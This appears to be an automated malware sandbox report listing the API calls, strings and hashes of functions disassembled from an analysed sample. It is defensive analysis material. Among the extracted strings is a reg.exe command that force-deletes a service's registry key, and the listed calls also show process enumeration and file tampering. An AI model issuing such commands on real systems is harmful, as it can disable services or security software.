                                                                                  • API ID: AddressCurrentHandleModuleProcProcess
                                                                                  • String ID: IsWow64Process$kernel32
                                                                                  • API String ID: 4190356694-3789238822
                                                                                  • Opcode ID: 16e4318675b6de59d61366d26e614efa2d9d40251b3eb1f8eef7ea1977021ad9
                                                                                  • Instruction ID: 0f3a6a78dbdcf503fa1048959266051117b5db78d4e4305ba6470b0b62749d59
                                                                                  • Opcode Fuzzy Hash: 16e4318675b6de59d61366d26e614efa2d9d40251b3eb1f8eef7ea1977021ad9
                                                                                  • Instruction Fuzzy Hash: 0BE012B2409220BAC71167E4CA0DA8A27FC9B49652F08486EF542D6015DF749C445E61
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E199A
                                                                                  • ShellExecuteA.SHELL32(00000000,open,reg.exe,00000000,00000000,00000000), ref: 6A6E19B7
                                                                                  Strings
                                                                                  • reg.exe, xrefs: 6A6E19AB
                                                                                  • delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f, xrefs: 6A6E1994
                                                                                  • open, xrefs: 6A6E19B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell_sprintf
                                                                                  • String ID: delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f$open$reg.exe
                                                                                  • API String ID: 2594544765-3721450906
                                                                                  • Opcode ID: caf4d9a15ce08a06621653eac9ff45203b8f9bfd8f5c5724088c7dcf23971caa
                                                                                  • Instruction ID: e7c6421823059db0c88531db18ce4ea6524f6e78d53e20e7ab152b1d1ef40511
                                                                                  • Opcode Fuzzy Hash: caf4d9a15ce08a06621653eac9ff45203b8f9bfd8f5c5724088c7dcf23971caa
                                                                                  • Instruction Fuzzy Hash: 16E0D8B0904200BAE514A730CE0DFDBB6E4ABA4708F42081CF28929082EF745708C663
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 6A70DAFC
                                                                                    • Part of subcall function 6A705883: __getptd_noexit.LIBCMT ref: 6A705886
                                                                                    • Part of subcall function 6A705883: __amsg_exit.LIBCMT ref: 6A705893
                                                                                  • __getptd.LIBCMT ref: 6A70DB0D
                                                                                  • __getptd.LIBCMT ref: 6A70DB1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: MOC$csm
                                                                                  • API String ID: 803148776-1389381023
                                                                                  • Opcode ID: fd754abcdf21b97910b19b56cd041df229b7efb1e6af3ee90d45722069e30fa3
                                                                                  • Instruction ID: 07a0822c19b3c647edcebdbb49f5c9379b12b76b825fd173d85d4dac35077dd6
                                                                                  • Opcode Fuzzy Hash: fd754abcdf21b97910b19b56cd041df229b7efb1e6af3ee90d45722069e30fa3
                                                                                  • Instruction Fuzzy Hash: 43E04FB26003048FD3009BE4D648B693BE4EB45718F1644A1D84CC7363DF34D4488946
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E199A
                                                                                  • ShellExecuteA.SHELL32(00000000,open,reg.exe,00000000,00000000,00000000), ref: 6A6E19B7
                                                                                  Strings
                                                                                  • reg.exe, xrefs: 6A6E19AB
                                                                                  • delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f, xrefs: 6A6E1994
                                                                                  • open, xrefs: 6A6E19B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell_sprintf
                                                                                  • String ID: delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f$open$reg.exe
                                                                                  • API String ID: 2594544765-3721450906
                                                                                  • Opcode ID: 29faa9e3ecb49614c29e57973eb5612c59d1f4456860c0b6a219d46f5547f0e9
                                                                                  • Instruction ID: 2908033409bc111f1371310e716447115814b09e970dd35f1cfdb70e336a7e2e
                                                                                  • Opcode Fuzzy Hash: 29faa9e3ecb49614c29e57973eb5612c59d1f4456860c0b6a219d46f5547f0e9
                                                                                  • Instruction Fuzzy Hash: 12E086B5544240B6E5149730DD0AFDBB6A59BA5704F414818F68929085DE745708D6A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1b1fbd3048424ff7a491facd465a11a7b2e3da87af40dcc652e7bae29897b00a
                                                                                  • Instruction ID: 924c54a56d106f38321609d503e767f46bd0edb4b2e0a35a207823805bb3c3c5
                                                                                  • Opcode Fuzzy Hash: 1b1fbd3048424ff7a491facd465a11a7b2e3da87af40dcc652e7bae29897b00a
                                                                                  • Instruction Fuzzy Hash: 53D16E39A04209EFCB10EFA4C4918EDBBBDEF49710F4564A5E940BB210D734BE4ACB65
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E23F7
                                                                                  • _memset.LIBCMT ref: 6A6E240E
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E2172
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E2185
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E2201
                                                                                    • Part of subcall function 6A6E2130: _memset.LIBCMT ref: 6A6E221A
                                                                                  • _memset.LIBCMT ref: 6A6E2496
                                                                                  • _strncat.LIBCMT ref: 6A6E24C4
                                                                                  • FilterConnectCommunicationPort.FLTLIB(00000000,00000000,00000000,00000000,00000000,6A72C218), ref: 6A6E24FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CommunicationConnectFilterPort_strncat
                                                                                  • String ID:
                                                                                  • API String ID: 1005276894-0
                                                                                  • Opcode ID: 627a50272ee24f46ce0d1c4d22fb483a1311c5c07d71e27e34518be2e7a94637
                                                                                  • Instruction ID: 3e457bc4e482d2b990ee91a260e3e1f34bdb70c5358b793894095554bb1dfdc7
                                                                                  • Opcode Fuzzy Hash: 627a50272ee24f46ce0d1c4d22fb483a1311c5c07d71e27e34518be2e7a94637
                                                                                  • Instruction Fuzzy Hash: A951C2B11083819FD710CFA8CC99A9BB3E9BB85314F154A6DE169C7291EB70D9088B92
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0F03
                                                                                    • Part of subcall function 6A6E0D30: _memset.LIBCMT ref: 6A6E0D56
                                                                                    • Part of subcall function 6A6E0D30: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 6A6E0D6E
                                                                                    • Part of subcall function 6A6E0D30: ReadFile.KERNEL32(?,00000000,00000300,00000000,00000000,?,00000000,00000000,00000000,?,?,00000000), ref: 6A6E0D85
                                                                                  • GetFileSize.KERNEL32(?,?), ref: 6A6E0F2A
                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 6A6E0F4C
                                                                                  • _memset.LIBCMT ref: 6A6E0F81
                                                                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000,00000000,?,?), ref: 6A6E0F97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$_memset$PointerRead$Size
                                                                                  • String ID:
                                                                                  • API String ID: 1098985663-0
                                                                                  • Opcode ID: fee0331d5111ea914d4e4fa0f54d613b2d0256fb4bf4873725014ea0ac1a6a8c
                                                                                  • Instruction ID: 159f380c542a055e2ce4e7d8e48fd25280295ff1e675b644aa20f6e760fbf526
                                                                                  • Opcode Fuzzy Hash: fee0331d5111ea914d4e4fa0f54d613b2d0256fb4bf4873725014ea0ac1a6a8c
                                                                                  • Instruction Fuzzy Hash: CF41147528A3419BD310CF19C884AABB7E5FBC8754F56093DF889C3345EF78D9068A62
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 52b728afeafdefde5b8056963dfdb8c76ae5c92e8d693707ce56709ea001846d
                                                                                  • Instruction ID: 10ffc29452caccb04d90b794b7b43e23a171152b75fb974ac3405afc3729d853
                                                                                  • Opcode Fuzzy Hash: 52b728afeafdefde5b8056963dfdb8c76ae5c92e8d693707ce56709ea001846d
                                                                                  • Instruction Fuzzy Hash: 4F3154B0A08200DBD764EB70D856B6EB7F5AF89354FC54C2CE44DCA291EF7898498747
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E1A50: _memset.LIBCMT ref: 6A6E1A89
                                                                                    • Part of subcall function 6A6E1A50: _strncpy.LIBCMT ref: 6A6E1AA6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 6A6E1E7A
                                                                                  • DeleteFileA.KERNEL32(?), ref: 6A6E1E88
                                                                                  • GetLastError.KERNEL32 ref: 6A6E1E97
                                                                                  • _memset.LIBCMT ref: 6A6E1EBD
                                                                                  • _memset.LIBCMT ref: 6A6E1ED7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$DeleteErrorFileLastSleep_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 1394207256-0
                                                                                  • Opcode ID: 5b80d67c8e075735fc37516920413013279cac5a74ebf60590d211268de6a765
                                                                                  • Instruction ID: 37ce5930e95435d8d279917c114abf59122e12737b60892d52440f02daea4609
                                                                                  • Opcode Fuzzy Hash: 5b80d67c8e075735fc37516920413013279cac5a74ebf60590d211268de6a765
                                                                                  • Instruction Fuzzy Hash: E221B2B250D3815FD620DB64C949BDF73EDBF91248F060829E98A83142EF349908C7B2
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(00000000,6A726A18,0000000C,6A6FC36B,00000001,00004000,00000000,?,00000000,00000000,00000001,?,?,6A6FC8EE,?,00000001), ref: 6A703EED
                                                                                  • GetLastError.KERNEL32(?,?,6A6FC8EE,?,00000001,?,00000000,000000FF,00000000,00000018,6A6F2E97,00000001,?,00000001,00000000), ref: 6A703EF7
                                                                                  • __dosmaperr.LIBCMT ref: 6A703EFE
                                                                                  • __alloc_osfhnd.LIBCMT ref: 6A703F1F
                                                                                  • __set_osfhnd.LIBCMT ref: 6A703F49
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                  • String ID:
                                                                                  • API String ID: 43408053-0
                                                                                  • Opcode ID: 05bbe23e9725f942b7ce5c669a7580b2778732da5026797db7db7ac989535245
                                                                                  • Instruction ID: ab27df29dd05fe238907f928e2c84eef5db5fb18d89e0cfbf9422f15e3b303d4
                                                                                  • Opcode Fuzzy Hash: 05bbe23e9725f942b7ce5c669a7580b2778732da5026797db7db7ac989535245
                                                                                  • Instruction Fuzzy Hash: 232103B1541A449ADB018B78C608B89FFF0AF42328F198364E5608F1D2CF359649CF40
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E0E07
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,000002FF,00000000), ref: 6A6E0E25
                                                                                  • ReadFile.KERNEL32(00000000,?,00000300,?,00000000), ref: 6A6E0E39
                                                                                  • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 6A6E0E61
                                                                                  • WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 6A6E0E75
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: File$Pointer$ReadWrite_memset
• String ID:
• API String ID: 231195935-0
• Opcode ID: b66e4cb67faec10e69ccc0532b158584be619628de6bbf05d92bc3bd931a6447
• Instruction ID: 76b28ee78aaa105e579c0fa5b81517bc72500e21d57f1626948ff0a46e070be9
• Opcode Fuzzy Hash: b66e4cb67faec10e69ccc0532b158584be619628de6bbf05d92bc3bd931a6447
• Instruction Fuzzy Hash: D0218C71205341ABE221DB19CC56FAFBBECEFC5B00F45492DF544C6181EB74AA05CBA6
APIs
• GetDC.USER32(00000000), ref: 0BEB8556
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0BEB856B
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 0BEB8575
• CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0BEB712F,00000000,0BEB71BB), ref: 0BEB8599
• ReleaseDC.USER32(00000000,00000000), ref: 0BEB85A4
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: CapsDevice$CreateHalftonePaletteRelease
• String ID:
• API String ID: 2404249990-0
• Opcode ID: fb82123a9729f295fcd8f144a72a33f1ad834ecf58379ff28a6ed3ee71fc9665
• Instruction ID: 1afef1d2b77acb8baf012d45cce18e54cd216f893b19f73cf745cc7c1975a9f9
• Opcode Fuzzy Hash: fb82123a9729f295fcd8f144a72a33f1ad834ecf58379ff28a6ed3ee71fc9665
• Instruction Fuzzy Hash: 9A118131A422595EDF61EF249941FEF36D8AB51255F042111F8145A380E7B48DA8C3A1
APIs
  • Part of subcall function 6A6FE2FD: __getptd.LIBCMT ref: 6A6FE302
• EnterCriticalSection.KERNEL32(6A72FC8C), ref: 6A6D3B91
• _rand.LIBCMT ref: 6A6D3BB0
  • Part of subcall function 6A6FE30F: __getptd.LIBCMT ref: 6A6FE30F
• _rand.LIBCMT ref: 6A6D3BE0
• _rand.LIBCMT ref: 6A6D3C10
• LeaveCriticalSection.KERNEL32(6A72FC8C,6A732B70,0000000D,6A732B70,0000000C,6A732B70,0000000B), ref: 6A6D3C30
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _rand$CriticalSection__getptd$EnterLeave
• String ID:
• API String ID: 4188531936-0
• Opcode ID: 58ea094fa99780627d795ca86864577b6dfc32cc1859eba4e8e31544f1561416
• Instruction ID: 6fd2a4ae744a4ba0c20682050e9756b5ddbbc2c682aad4f98e13b4704dd487d6
• Opcode Fuzzy Hash: 58ea094fa99780627d795ca86864577b6dfc32cc1859eba4e8e31544f1561416
• Instruction Fuzzy Hash: 24118C771492608BC321A368868CF2BFAD6CFC9644B0B0874DE8597263CF20DC0386F9
APIs
• GetDC.USER32(00000000), ref: 0BEB5FC0
• GetDeviceCaps.GDI32(?,00000068), ref: 0BEB5FDC
• GetPaletteEntries.GDI32(0E080E34,00000000,00000008,?), ref: 0BEB5FF4
• GetPaletteEntries.GDI32(0E080E34,00000008,00000008,?), ref: 0BEB600C
• ReleaseDC.USER32(00000000,?), ref: 0BEB6028
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: EntriesPalette$CapsDeviceRelease
• String ID:
• API String ID: 3128150645-0
• Opcode ID: e7db8ff0d494c78fc906366c4013aaf4e38bd99a6309a29746329a7f0b0fede4
• Instruction ID: 9445f228fabde51412505669345ff3b6e556b6c4b85caf1aada497edff930e4d
• Opcode Fuzzy Hash: e7db8ff0d494c78fc906366c4013aaf4e38bd99a6309a29746329a7f0b0fede4
• Instruction Fuzzy Hash: C31104716483046FEF51CBA59C42FAABBE8E748700F4080A1F5149A1C0EBB29948C320
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,001F0FFF), ref: 6A6DDB0B
• _memset.LIBCMT ref: 6A6DDB3C
• Process32First.KERNEL32 ref: 6A6DDB52
• Process32Next.KERNEL32(00000000,00000000), ref: 6A6DDB6C
• CloseHandle.KERNEL32(00000000), ref: 6A6DDB7C
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
• String ID:
• API String ID: 2526126748-0
• Opcode ID: 6d4a41673fa17df86b8299c9f0ccbcd06cef983d673ba703b964ea58f67c7482
• Instruction ID: f637fce7ab56923bc3e71a19c96e54e71e159ef8060cb161af5938a0308dc0ea
